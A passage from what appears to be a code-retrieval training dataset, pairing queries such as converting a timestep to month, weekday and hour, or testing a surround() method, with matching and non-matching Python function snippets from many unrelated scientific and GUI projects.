"def histSjA_RewardTensor(env, h):\n hmax=max(h) # the maximum history length\n l = (env.N+1)*hmax # length of a single history representation\n \n SAHists = StateActHistsIx(env, h)\n\n # dimension for history reward tensor\n Zh = len(SAHists)\n dims = list(env.R.shape)\n dims[1] = Zh\n dims[-1] = Zh\n\n Rh = np.zeros(dims) # init reward tensor\n # go through all pairs of histories\n for i, hist in enumerate(SAHists):\n for j, hist_ in enumerate(SAHists):\n hix, ix = _transition_ix(env, h, i, hist, j, hist_)\n hix = tuple([slice(env.N)]+list(hix))\n ix = tuple([slice(env.N)]+list(ix))\n Rh[hix] = env.R[ix]\n \n return Rh",
"def _update_h(self):\n pass",
"def h( self , x , u , t ):\n \n #y = np.zeros(self.p) # Output vector\n \n y = self.sys.h( x , self.sys.ubar , t )\n \n return y",
"def calc_Qh(self):\n qh = self.qh_at_t1() \n\n # Find q hat at each time step by stepping backwards in time from qh1\n p = TestFunction(self.V)\n qh_prev = TrialFunction(self.V)\n \n a = inner(p, qh_prev)*dx\n A = assemble(a)\n\n qh_prev = Function(self.V) # unknown at next timestep\n\n u = Function(self.V)\n q = Function(self.V)\n \n for n in reversed(xrange(self.N)):\n u.assign(self.U[n])\n q.assign(self.Q[n])\n j = self.j(q)\n\n c = 0.5*(inner(u,u)/j - (self.alpha_sq)*self.j(u)**2/j**3)\n\n L = inner(p,qh)*dx - inner(c*p.dx(0),q.dx(0))*self.dt*dx\n \n b = assemble(L)\n\n solve(A, qh_prev.vector(), b)\n\n qh.assign(qh_prev)\n\n self.Qh[n].assign(qh)",
"def _h_function(self,h):\n return self.contribution * np.exp(-1.0 * h / self.a)",
"def forward(self, h_prev, x_t):\n # softmax(arr, axis=0)\n m, i = x_t.shape\n Wi = self.Wh[:i]\n Wh = self.Wh[i:]\n cat = np.concatenate((h_prev, x_t), axis=1)\n # print('meow', cat.shape)\n h_next = np.tanh(cat @ self.Wh + self.bh)\n y = self.softmax(h_next @ self.Wy + self.by)\n return h_next, y",
"def theta_h(self):\n if self._theta_h is not None:\n return self._S\n theta_h = 0.0\n n = self.n_hap\n nnm1 = n*(n-1.)/2.\n for i,site in enumerate(self.sfs):\n pi += site * i * i",
"def update_hx(self, time=0, hx = None, hx_idx = None):\n\t\tif hx_idx is not None:\n\t\t\tself.hx_discrete[time]=hx_idx\n\t\telif hx is not None:\n\t\t\tidx = np.argmin(np.abs(self.h_set-hx))\n\t\t\tself.hx_discrete[time] = idx\n\t\telse:\n\t\t\tassert False, \"Error in update_hx in Hamiltonian class\"",
"def update_step(self, t, replay_buffer, lr):\r\n\r\n s_batch, a_batch, r_batch, sp_batch, done_mask_batch = replay_buffer.sample(\r\n self.config.batch_size)\r\n \r\n\r\n fd = {\r\n # inputs\r\n self.s: s_batch,\r\n self.a: a_batch,\r\n self.r: r_batch,\r\n self.sp: sp_batch, \r\n self.done_mask: done_mask_batch,\r\n self.lr: lr, \r\n # extra info\r\n self.avg_reward_placeholder: self.avg_reward, \r\n self.max_reward_placeholder: self.max_reward, \r\n self.std_reward_placeholder: self.std_reward, \r\n self.avg_q_placeholder: self.avg_q, \r\n self.max_q_placeholder: self.max_q, \r\n self.std_q_placeholder: self.std_q, \r\n self.eval_reward_placeholder: self.eval_reward, \r\n }\r\n\r\n if self.config.lwf:\r\n fd[self.eval_reward_old_placeholder] = self.eval_reward_old\r\n\r\n if self.config.noise:\r\n state_shape = list(self.env.observation_space.shape)\r\n img_height, img_width, nchannels = state_shape\r\n if t > 0 and t % self.config.num_adv_iter == 0 and self.config.adv:\r\n\t\t self.noise_update = 255*self.noise_update/np.max(self.noise_update, axis=(1,2,3), keepdims=True)\r\n #print 'Adding adversarial noise', self.noise_update\r\n noise = self.noise_update + self.prev_noise\r\n noise_min = np.min(noise, axis=(1,2,3), keepdims=True)\r\n noise_zero = noise - noise_min\r\n noise_max = np.max(noise_zero, axis=(1,2,3), keepdims=True)\r\n noise_scaled = 255*(noise_zero/noise_max)\r\n noise = noise_scaled.astype(np.uint8)\r\n else:\r\n noise = np.random.choice(np.arange(256, dtype=np.uint8), replace=True, size=[self.config.batch_size, \\\r\n img_height, img_width, nchannels*self.config.state_history])\r\n fd[self.n] = noise\r\n self.prev_noise = noise\r\n\r\n if self.config.adv:\r\n\t loss_eval, grad_norm_eval, summary, self.noise_update, _ = self.sess.run([self.loss, \\\r\n self.grad_norm, self.merged, self.noise_grad, self.train_op], feed_dict=fd)\r\n else:\r\n loss_eval, grad_norm_eval, summary, _ = self.sess.run([self.loss, \\\r\n self.grad_norm, self.merged, self.train_op], feed_dict=fd)\r\n \r\n\r\n\r\n # tensorboard stuff\r\n self.file_writer.add_summary(summary, t)\r\n \r\n return loss_eval, grad_norm_eval",
"def _cal_hoag(self) -> AbstractHOAG:\n # 读入梯度信息\n with open(self.our_work, \"r\") as fp:\n lines = fp.readlines()\n # 计算loss的值\n loss = [float(line.strip().split()[0]) for line in lines]\n gradient = []\n for i in range(1, len(loss)):\n gradient.append((loss[i] - loss[i - 1]) * len(loss))\n hoag = DummyHOAG(0.00095, 1, np.array(gradient))\n\n return hoag",
"def __init__(self, wh_p=4.5, ua=0.0019678, eta=1, t2=49, d=0.55, h=1.0):\n self.WH_P = wh_p #[kJ/sec] rated power of water heater\n self.UA = ua #[kJ/(sec C)] = 7.084 kJ/hr-C\n self.eta_c = eta #[none] recovery efficiency\n self.T2 = t2 #[C] initial temperature of top node in Celsius\n self.diameter = d #[m] tank diameter in meters\n self.height = h #[m] tank height in meters\n self.T1 = self.T2 - 1 #[C] bottom node temperature\n self.Cp = 4.1818 #[kJ/(kg C)] heat capacity of water\n self.D = 1000 #[kg/m^3] density of water\n self.volume = self.height * np.pi * (self.diameter / 2)**2 #[m^3]\n self.S_top = 0.25 * np.pi * self.diameter**2 #[m^2] top area\n self.S_side = np.pi * self.diameter * self.height #[m^2] side area\n self.S_total = self.S_top * 2 + self.S_side #[m^2] total area\n self.UA1 = self.UA*(self.S_top+(2./3.)*self.S_side)/self.S_total #bottom UA\n self.UA2 = self.UA*(self.S_top+(1./3.)*self.S_side)/self.S_total #top UA\n self.C1 = self.volume * (2./3.) * self.D * self.Cp #bottom\n self.C2 = self.volume * (1./3.) * self.D * self.Cp #top\n self.phi, self.gamma = None, None"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
convert timestep to datetime and return (month, weekday, hour)
|
def t_to_month_weekday_hour(self):
dt = self.t0_datetime + timedelta(minutes=self.t * self.ts_size)
return (int(dt.month), int(dt.weekday()), int(dt.hour))
|
[
"def transform_date(observation):\n \n date_ = observation.get(\"Date\")\n \n try:\n date = pd.Timestamp(date_)\n hour = date.hour\n month = date.month\n day_of_week = date.day_name()\n except:\n hour = 0\n month = 0\n day_of_week = '' \n\n return hour, month, day_of_week",
"def split_timestamp(dto):\n return tuple(dto.strftime(\"%Y %m %d %H\").split())",
"def timestamp_to_week_and_hour(tmpstmp):\n date = datetime.fromtimestamp(tmpstmp)\n week = date.isocalendar()[1] - 1\n return week, date.hour",
"def time_of_trip(datum, city):\n \n # YOUR CODE HERE\n if city=='NYC':\n date_object=datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S')\n elif city=='Chicago':\n date_object=datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M')\n else:\n date_object=datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M')\n\n print('The date is {}'.format(date_object))\n month=date_object.month\n hour=date_object.hour\n day_of_week=date_object.strftime('%A')\n print('The month is {} , the hour is {} and the day of week is {}'.format(month,hour,day_of_week))\n \n return (month, hour, day_of_week)",
"def dti2step(self, dt):\n\n dt = pd.Timestamp(dt)\n if dt.hour == 0: # Datetime only has date.\n dt = dt + pd.Timedelta(self.start_hour + ':00') # Add time to the date.\n step = self.dti.get_loc(dt) * 60\n return step",
"def get_hhmm(time_str): \n (hh, mmxx) = time_str.split(':')\n hh = int(hh)\n mm = int(mmxx[:2])\n xx = mmxx[2:]\n if xx == 'PM': \n hh += 12\n return [hh, mm]",
"def time_of_trip(datum, city):\n \n # YOUR CODE HERE\n if city == 'NYC':\n #Matching time format with the data\n time= datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S')\n month= int(time.strftime(\"%-m\")) #storing month value\n day_of_week= str(datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S').strftime(\"%A\")) #storing day name\n hour= int(time.strftime(\"%-H\")) #storing hour value\n elif city=='Chicago':\n time= datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M')\n month= int(time.strftime(\"%-m\"))\n day_of_week= str(datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M').strftime(\"%A\"))\n hour= int(time.strftime(\"%-H\"))\n elif city== 'Washington':\n time= datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M')\n month= int(time.strftime(\"%-m\"))\n day_of_week= str(datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M').strftime(\"%A\"))\n hour= int(time.strftime(\"%-H\"))\n \n return (month, hour, day_of_week)",
"def get_time_arrays():\n\thours = [str(i).zfill(2) for i in range(25)]\n\tminutes = [str(i).zfill(2) for i in range(60)]\n\treturn hours, minutes",
"def convert_to_datetime(line):\n data = line.split(' ')\n line_datetime = data[1].split('T')\n line_date = [int(x) for x in line_datetime[0].split('-')]\n line_time = [int(x) for x in line_datetime[1].split(':')]\n return datetime(line_date[0], line_date[1], line_date[2], line_time[0], line_time[1], line_time[2])",
"def durationlist2datetime(duration_split):\n assert len(duration_split)%2 == 0\n digits = []\n if len(duration_split) == 4:\n # case # h # m\n digits = [int(duration_split[0]), int(duration_split[2])] \n elif len(duration_split) == 2:\n if duration_split[1] == 'm':\n digits = [0, int(duration_split[0])]\n elif duration_split[1] == 'h':\n digits = [int(duration_split[0]), 0]\n else:\n raise ValueError('duration string should be in the form # m, # h, or # h # m')\n assert len(digits) != 0\n duration_datetime = timedelta(hours = digits[0], minutes=digits[1])# datetime.strptime('::'.join(digits),'%H::%M')\n return duration_datetime",
"def convert_words_to_datetime(input_bytes):\n if len(input_bytes) != 6:\n raise SampleException(\"Invalid number of bytes in input! Found %s\" % len(input_bytes))\n\n minutes, seconds, day, hour, year, month, = struct.unpack('<6B', input_bytes)\n\n minutes = int('%02x' % minutes)\n seconds = int('%02x' % seconds)\n day = int('%02x' % day)\n hour = int('%02x' % hour)\n year = int('%02x' % year)\n month = int('%02x' % month)\n\n return [minutes, seconds, day, hour, year, month]",
"def __splitTime(sec):\n minute, sec = divmod(sec, 60)\n hour, minute = divmod(minute, 60)\n return hour, minute, sec",
"def parse_timestep(self, timestep):\n ts = timestep[0]\n obs, reward, done = ts.observation, ts.reward, ts.step_type == StepType.LAST\n # add step_mul to obs\n\n setattr(obs, 'step_mul', self.step_mul)\n setattr(obs, 'map_size', self.env_instance._interface_formats[0]._raw_resolution)\n\n return obs, reward, done",
"def time_param(S):\n # dt\n dt = datetime.strptime(S['Time_step'], S['Time_format']).time()\n if dt.hour != 0 and dt.minute == 0 and dt.second == 0:\n dt = dt.hour\n elif dt.hour == 0 and dt.minute != 0 and dt.second == 0:\n dt = dt.minute / 60\n else:\n print_error('Period_length')\n \n Datetime_format = S['Date_format'] + ' ' + S['Time_format']\n start = S['Period_start'] + ' ' + S['Period_start_time']\n dt_start = datetime.strptime(start, Datetime_format)\n end = S['Period_end'] + ' ' + S['Period_start_time']\n dt_end = datetime.strptime(end, Datetime_format)\n \n # Nbr_of_time_steps\n Nbr_of_time_steps = (((dt_end - dt_start).days + 1) * 24) / dt\n Nbr_of_time_steps_per_day = 24 / dt\n \n # Period index\n if (int(Nbr_of_time_steps) == Nbr_of_time_steps and \n int(Nbr_of_time_steps_per_day) == Nbr_of_time_steps_per_day):\n Periods = list(range(0, int(Nbr_of_time_steps)))\n else:\n print_error('time_step_int')\n \n # Day index\n Days = list(range((dt_end - dt_start).days))\n \n # Hour index\n Hours = list(range(0,24))\n \n # Date of each day\n Day_dates = [dt_end - timedelta(days=i) for i in range(len(Days))]\n\n Time = []\n for t in range(0, int(Nbr_of_time_steps_per_day)):\n Time.append(datetime.strftime(Day_dates[0] + timedelta(hours=t*dt), S['Time_format'])) \n \n return Periods, Nbr_of_time_steps, dt, Day_dates, Time, dt_end, Days, Hours",
"def integration_times(hdulist):\n int_times = hdulist['INT_TIMES'].data\n starting = int_times['int_start_MJD_UTC']\n mid = int_times['int_mid_MJD_UTC']\n ending = int_times['int_end_MJD_UTC']\n return starting, mid, ending",
"def timedelta_to_waq_timestep(td):\n total_seconds = td.total_seconds()\n assert td.microseconds==0\n secs = total_seconds % 60\n mins = (total_seconds // 60) % 60\n hours = (total_seconds // 3600) % 24\n days = (total_seconds // 86400)\n \n # seconds\n # minutes\n # hours\n # days\n # hydrodynamic-timestep '00000000 00 3000'\n \n return \"%08d%02d%02d%02d\"%(days, hours, mins, secs)",
"def _get_time_step(self):\n if self.data_level == 1:\n self.dt = self._dt_min\n elif self.data_level == 2:\n self.dt = self._dt_min * 128\n elif self.data_level == 3:\n self.dt = self._dt_min * 128 * 128\n else:\n print \"ERROR: data level must be set\"",
"def convert_time_format(otime):\n\n save = []\n prev = 0\n for ent in otime:\n out = Chandra.Time.DateTime(ent).date\n atemp = re.split(':', out)\n\n year = int(atemp[0])\n yday = float(atemp[1])\n hh = float(atemp[2])\n mm = float(atemp[3])\n ss = float(atemp[4])\n\n yday += hh /24.0 + mm / 1440.0 + ss / 86400.0\n\n if prev == 0:\n prev = year\n save.append(yday)\n if mcf.is_leapyear(year):\n base = 366\n else:\n base = 365\n else:\n if year != prev:\n save.append(yday + base)\n else:\n save.append(yday)\n\n return [save, prev]",
"def get_weekday_time() -> list:\n return [DAYS[date.today().weekday()], get_utc_time()]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
testing the surround() method
|
def test1(self):
self.field.surround()
self.assertEqual(self.field, [
[None, None, None, None, None],
[None, 1 , 2 , 3 , None],
[None, 4 , 5 , 6 , None],
[None, 7 , 8 , 9 , None],
[None, 10 , 11 , 12 , None],
[None, None, None, None, None],
])
|
[
"def test_surround_adds_two_extra_lines(self):\n label_surrounded_string = self.g._surround_with_label(\n self.graph_string,\n 100,\n 4,\n 0,\n 1.29,\n 2.5\n )\n assert len(label_surrounded_string.splitlines()) == len(self.graph_string.splitlines()) + 2",
"def test_surround_adds_three_lines_with_timestamps(self):\n label_surrounded_string = self.g._surround_with_label(\n self.graph_string,\n 100,\n 4,\n 0,\n 1.29,\n 2.5,\n start_ctime='Wed Jan 1 00:00:00 2020',\n end_ctime='Sun Jan 5 00:00:00 2020',\n )\n assert len(label_surrounded_string.splitlines()) == len(self.graph_string.splitlines()) + 3",
"def html_surround(phrase, tag=\"strong\"):\n\n return \"<\" + tag + \">\" + str(phrase) + \"</\" + tag + \">\"",
"def test_to_string_with_indent(self):\n self.sut = BlockObject('bar')\n\n self.sut._indent()\n first = str(self.sut)\n self.sut._dedent()\n\n second = ' bar {' + os.linesep\n second += ' }' + os.linesep\n\n self.assertEqual(first, second)",
"def bannerline ( s, char='-', size=6, surround=True ):\n s = f\" {s} \"\n if surround: print()\n print(tc.colored(s.center(len(s) + size, char), gColor))\n if surround: print()",
"def test_unclosed_tags_get_closed(self):\n ...",
"def wrap(text, open_tag, close_tag):\n return ''.join((open_tag, text, close_tag, ))",
"def test_removal_of_enclosing_on_string(enclosing, value, inplace):\n\n if enclosing == \"{0}\":\n _skip_pseudo_enclosing_value(value)\n\n # Create test string\n key = \"someKey\"\n raw = f\"<--- does not matter for this unit test -->\"\n start_line = 5\n\n original = String(\n start_line=start_line, key=key, raw=raw, value=enclosing.format(value)\n )\n\n middleware = RemoveEnclosingMiddleware(allow_inplace_modification=inplace)\n\n transformed_library = middleware.transform(library=Library([original]))\n\n # Assert correct library state\n assert len(transformed_library.blocks) == 1\n assert len(transformed_library.strings) == 1\n # Assert correct removal of enclosing\n transformed = transformed_library.strings[0]\n assert transformed.value == value\n expected_enclosing = (\n enclosing.format(\"\")[0] if enclosing != \"{0}\" else \"no-enclosing\"\n )\n assert transformed.parser_metadata[\"removed_enclosing\"] == expected_enclosing\n # Assert remaining fields are unchanged\n assert transformed.start_line == start_line\n assert transformed.key == key\n assert transformed.raw == raw\n\n # Assert `allow_inplace_modification` is respected\n assert_inplace_is_respected(inplace, original, transformed)",
"def test_spaces_outside_section(self):\n self.assertContains('enwiki_help_editing', 'Naming and_moving')\n self.assertContains('enwiki_help_editing', ' Naming and_moving ')\n self.assertContains('enwiki_help_editing', ' Naming and_moving_')",
"def highlight_surrounding_brackets():\n open_bracket, close_bracket = current_bracket_scope()\n if open_bracket and close_bracket:\n vim.command(MATCH_POS.format(\n row=open_bracket[0],\n column=open_bracket[1]))\n vim.command(MATCH_POS.format(\n row=close_bracket[0],\n column=close_bracket[1]))",
"def add_escapement_back_in_group(text):\n escaped_text = \"\"\n for c in text:\n if ( c == ESCAPE_SYM or is_boundary_sym(c)\n or is_group_modifier_sym(c) or is_comment_sym(c)):\n escaped_text += ESCAPE_SYM + c\n else:\n escaped_text += c\n escaped_text = add_escapement_back_for_not_comments(escaped_text)\n return escaped_text.replace(ESCAPE_SYM+ESCAPE_SYM+ARG_SYM, ESCAPE_SYM+ARG_SYM)",
"def test_wrap():\n # Start with a fairly simple test where the image is 4 copies of the same data:\n im_orig = galsim.Image([[ 11., 12., 13., 14., 11., 12., 13., 14. ],\n [ 21., 22., 23., 24., 21., 22., 23., 24. ],\n [ 31., 32., 33., 34., 31., 32., 33., 34. ],\n [ 41., 42., 43., 44., 41., 42., 43., 44. ],\n [ 11., 12., 13., 14., 11., 12., 13., 14. ],\n [ 21., 22., 23., 24., 21., 22., 23., 24. ],\n [ 31., 32., 33., 34., 31., 32., 33., 34. ],\n [ 41., 42., 43., 44., 41., 42., 43., 44. ]])\n im = im_orig.copy()\n b = galsim.BoundsI(1,4,1,4)\n im_quad = im_orig[b]\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, 4.*im_quad.array, 12,\n \"image.wrap() into first quadrant did not match expectation\")\n\n # The same thing should work no matter where the lower left corner is:\n for xmin, ymin in ( (1,5), (5,1), (5,5), (2,3), (4,1) ):\n b = galsim.BoundsI(xmin, xmin+3, ymin, ymin+3)\n im_quad = im_orig[b]\n im = im_orig.copy()\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, 4.*im_quad.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n im[b].fill(0)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return a view of the original\")\n\n # Now test where the subimage is not a simple fraction of the original, and all the\n # sizes are different.\n im = galsim.ImageD(17, 23, xmin=0, ymin=0)\n b = galsim.BoundsI(7,9,11,18)\n im_test = galsim.ImageD(b, init_value=0)\n for i in range(17):\n for j in range(23):\n val = np.exp(i/7.3) + (j/12.9)**3 # Something randomly complicated...\n im[i,j] = val\n # Find the location in the sub-image for this point.\n ii = (i-b.xmin) % (b.xmax-b.xmin+1) + b.xmin\n jj = (j-b.ymin) % (b.ymax-b.ymin+1) + b.ymin\n im_test.addValue(ii,jj,val)\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, im_test.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im_wrap.bounds, b,\n \"image.wrap(%s) does not have the correct bounds\")\n\n # For complex images (in particular k-space images), we often want the image to be implicitly\n # Hermitian, so we only need to keep around half of it.\n M = 38\n N = 25\n K = 8\n L = 5\n im = galsim.ImageCD(2*M+1, 2*N+1, xmin=-M, ymin=-N) # Explicitly Hermitian\n im2 = galsim.ImageCD(2*M+1, N+1, xmin=-M, ymin=0) # Implicitly Hermitian across y axis\n im3 = galsim.ImageCD(M+1, 2*N+1, xmin=0, ymin=-N) # Implicitly Hermitian across x axis\n #print('im = ',im)\n #print('im2 = ',im2)\n #print('im3 = ',im3)\n b = galsim.BoundsI(-K+1,K,-L+1,L)\n b2 = galsim.BoundsI(-K+1,K,0,L)\n b3 = galsim.BoundsI(0,K,-L+1,L)\n im_test = galsim.ImageCD(b, init_value=0)\n for i in range(-M,M+1):\n for j in range(-N,N+1):\n # An arbitrary, complicated Hermitian function.\n val = np.exp((i/(2.3*M))**2 + 1j*(2.8*i-1.3*j)) + ((2 + 3j*j)/(1.9*N))**3\n #val = 2*(i-j)**2 + 3j*(i+j)\n\n im[i,j] = val\n if j >= 0:\n im2[i,j] = val\n if i >= 0:\n im3[i,j] = val\n\n ii = (i-b.xmin) % (b.xmax-b.xmin+1) + b.xmin\n jj = (j-b.ymin) % (b.ymax-b.ymin+1) + b.ymin\n im_test.addValue(ii,jj,val)\n #print(\"im = \",im.array)\n\n # Confirm that the image is Hermitian.\n for i in range(-M,M+1):\n for j in range(-N,N+1):\n assert im(i,j) == im(-i,-j).conjugate()\n\n im_wrap = im.wrap(b)\n #print(\"im_wrap = \",im_wrap.array)\n np.testing.assert_almost_equal(im_wrap.array, im_test.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im_wrap.bounds, b,\n \"image.wrap(%s) does not have the correct bounds\")\n\n im2_wrap = im2.wrap(b2, hermitian='y')\n #print('im_test = ',im_test[b2].array)\n #print('im2_wrap = ',im2_wrap.array)\n #print('diff = ',im2_wrap.array-im_test[b2].array)\n np.testing.assert_almost_equal(im2_wrap.array, im_test[b2].array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im2_wrap.array, im2[b2].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im2_wrap.bounds, b2,\n \"image.wrap(%s) does not have the correct bounds\")\n\n im3_wrap = im3.wrap(b3, hermitian='x')\n #print('im_test = ',im_test[b3].array)\n #print('im3_wrap = ',im3_wrap.array)\n #print('diff = ',im3_wrap.array-im_test[b3].array)\n np.testing.assert_almost_equal(im3_wrap.array, im_test[b3].array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im3_wrap.array, im3[b3].array,\n \"image.wrap(%s) did not return the right subimage\")\n np.testing.assert_equal(im3_wrap.bounds, b3,\n \"image.wrap(%s) does not have the correct bounds\")\n\n b = galsim.BoundsI(-K+1,K,-L+1,L)\n b2 = galsim.BoundsI(-K+1,K,0,L)\n b3 = galsim.BoundsI(0,K,-L+1,L)\n assert_raises(TypeError, im.wrap, bounds=None)\n assert_raises(ValueError, im3.wrap, b, hermitian='x')\n assert_raises(ValueError, im3.wrap, b2, hermitian='x')\n assert_raises(ValueError, im.wrap, b3, hermitian='x')\n assert_raises(ValueError, im2.wrap, b, hermitian='y')\n assert_raises(ValueError, im2.wrap, b3, hermitian='y')\n assert_raises(ValueError, im.wrap, b2, hermitian='y')\n assert_raises(ValueError, im.wrap, b, hermitian='invalid')\n assert_raises(ValueError, im2.wrap, b2, hermitian='invalid')\n assert_raises(ValueError, im3.wrap, b3, hermitian='invalid')",
"def test_underline_characters_in_section(self):\n self.assertContains('enwiki_help_editing', 'Talk_(discussion)_pages',\n 'Understood by mediawiki')",
"def testCompoundCenter(self):\n\n def cylinders(self, radius, height):\n\n c = Solid.makeCylinder(radius, height, Vector())\n\n # Combine all the cylinders into a single compound\n r = self.eachpoint(lambda loc: c.located(loc), True).combineSolids()\n\n return r\n\n Workplane.cyl = cylinders\n\n # Now test. here we want weird workplane to see if the objects are transformed right\n s = (\n Workplane(\"XY\")\n .rect(2.0, 3.0, forConstruction=True)\n .vertices()\n .cyl(0.25, 0.5)\n )\n\n self.assertEqual(4, len(s.val().Solids()))\n self.assertTupleAlmostEquals((0.0, 0.0, 0.25), s.val().Center().toTuple(), 3)",
"def nest(self, a, b):\n # Split string for injection\n midpoint = int(len(b) / 2)\n # Inject a pair of parentheses\n #print(\"{}{}{}\".format(b[:midpoint], a, b[midpoint:]))\n return \"{}{}{}\".format(b[:midpoint], a, b[midpoint:])",
"def round_end(self, hooker):\r\n pass",
"def test_merge_normal_text_collapsable_whitespaces():\n b = Block(0, Prefix())\n b.merge_normal_text(\"Hallo\")\n assert b._content == 'Hallo'\n assert not b.collapsable_whitespace\n\n b = Block(0, Prefix())\n b.merge_normal_text(\" Hallo \")\n assert b._content == 'Hallo '\n assert b.collapsable_whitespace\n\n b = Block(0, Prefix())\n b.merge_normal_text('')\n assert b._content == ''\n assert b.collapsable_whitespace\n\n b.merge_normal_text(' ')\n assert b._content == ''\n assert b.collapsable_whitespace\n\n b.merge_normal_text(' ')\n assert b._content == ''\n assert b.collapsable_whitespace",
"def test_after_space():\n print('Testing after_space')\n result = currency.after_space(' ')\n introcs.assert_equals(' ', result)\n result = currency.after_space('Nicholas ')\n introcs.assert_equals('', result)\n result = currency.after_space('Nich olas')\n introcs.assert_equals('olas', result)\n result = currency.after_space(' Nicholas')\n introcs.assert_equals('Nicholas', result)\n result = currency.after_space('N i c h o l a s')\n introcs.assert_equals('i c h o l a s', result)",
"def test_tag_runs(self):\n pass"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Show up image of each connector of a KSK
|
def show_KSK_images(self, index: int = None):
KSK_name = ""
if type(index) == int and 0 <= index < self.list_widget.count():
KSK_name = self.list_widget.item(index).text()
self.list_widget.selectedItems().clear()
self.list_widget.setCurrentRow(index)
else:
KSK_name = self.list_widget.selectedItems()[0].text()
get_KSK(KSK_name)
connectors_gb = self.createParentGroup(f"Connectors Of {KSK_name}")
connectors_gb.setStyleSheet("font-size: 22px")
self.main_grid.addWidget(connectors_gb, 0, 2, 9, 4)
next_btn = QPushButton(connectors_gb)
next_btn.setGeometry(980, 290, 70, 40)
MyIcon2 = QPixmap('input/images/next.png')
next_btn.setIcon(QIcon(MyIcon2))
next_btn.setIconSize(QSize(100, 40))
next_btn.setToolTip('next')
next_btn.setStyleSheet("background-color :#fbeec1;color:#fbeec1")
next_btn.clicked.connect(lambda: self.show_KSK_images(
self.list_widget.selectedIndexes()[0].row() + 1))
previous_btn = QPushButton(connectors_gb)
previous_btn.setGeometry(20, 290, 70, 40)
MyIcon = QPixmap('input/images/previous.png')
previous_btn.setIcon(QIcon(MyIcon))
previous_btn.setIconSize(QSize(100, 40))
previous_btn.setToolTip('Previous')
previous_btn.setStyleSheet("background-color :#fbeec1;color:#fbeec1")
previous_btn.clicked.connect(lambda: self.show_KSK_images(
self.list_widget.selectedIndexes()[0].row() - 1))
|
[
"def show(self):\n plt.figure(randint(0, 256))\n plt.imshow(self.image,)\n plt.xticks([]), plt.yticks([])\n plt.show()",
"def plot_pair_img_label(img,label,figsize=(8,4)):\n\n fig=plt.figure(figsize=figsize)\n columns = 2\n rows = 1\n\n\n fig.add_subplot(rows, columns, 1)\n plt_imshow_squeeze_if_channel_eq1(img)\n #plt.imshow(img)\n\n fig.add_subplot(rows, columns, 2)\n plt_imshow_squeeze_if_channel_eq1(label)\n #plt.imshow(label, cmap=plt.cm.gray) \n\n plt.show() \n\n print(\"img,label shape:\", img.shape, label.shape)",
"def display(self):\n self.o.display_image(self.image)",
"def DrawDirectionImage(self):\n #plt.figure(figsize=Settings.FigureSize)\n plt.figure(figsize=(5,5))\n plt.subplot(2,2,1)\n plt.imshow(self.Directions['W'])\n plt.title('Agent looking W,ID:{}'.format(self.ID))\n plt.subplot(2,2,2)\n plt.imshow(self.Directions['E'])\n plt.title('Agent looking E,ID:{}'.format(self.ID))\n plt.subplot(2,2,3)\n plt.imshow(self.Directions['N'])\n plt.title('Agent looking N,ID:{}'.format(self.ID))\n plt.subplot(2,2,4)\n plt.imshow(self.Directions['S'])\n plt.title('Agent looking S,ID:{}'.format(self.ID))",
"def showMatches(img1, img2, kp1xy, kp2xy):\n fig = plt.figure()\n s1 = img1.shape\n s2 = img2.shape\n print s1\n print s2\n step = 0\n plt.imshow(img1, extent=(0, s1[1], 0, s1[0]), origin='lower')\n bx = (s1[1]+step)#*0.7\n by = (s1[0]+step)#*0.7\n plt.imshow(img2, extent=(bx, bx+s2[1], by, by+s2[0]), origin='lower')\n a1 = kp1xy\n a2 = kp2xy.copy()\n a2[:,0] += by\n a2[:,1] += bx\n lines = [[p1[::-1], p2[::-1]] for p1, p2 in zip(a1, a2)]\n cmap = cm.prism\n cmap = cm.spring\n cs = cmap(n.linspace(0, 1, len(lines)))\n lc = mc.LineCollection(lines, linewidths=1, colors=cs)\n ax = fig.gca()\n ax.add_collection(lc)\n ax.set_xlim([0, s1[1]+step+s2[1]])\n ax.set_ylim([0, s1[0]+step+s2[0]])",
"def lines(self):\r\n w, h = self.width, self.height # create local shortcut for image size\r\n board = ImageDraw.Draw(self.board) # create interactive image (for drawing)\r\n for loop in range(8): # draw 8 pairs of random lines on image\r\n xa, ya, xb, yb = rr(w), rr(h), rr(w), rr(h) # select random coordinates\r\n board.line((xa, 0, xb, h), width=2, fill='#000') # line from top to bottom\r\n board.line((0, ya, w, yb), width=2, fill='#000') # line from left to right\r\n self.label['image'] = self.image = ImageTk.PhotoImage(self.board) # update\r",
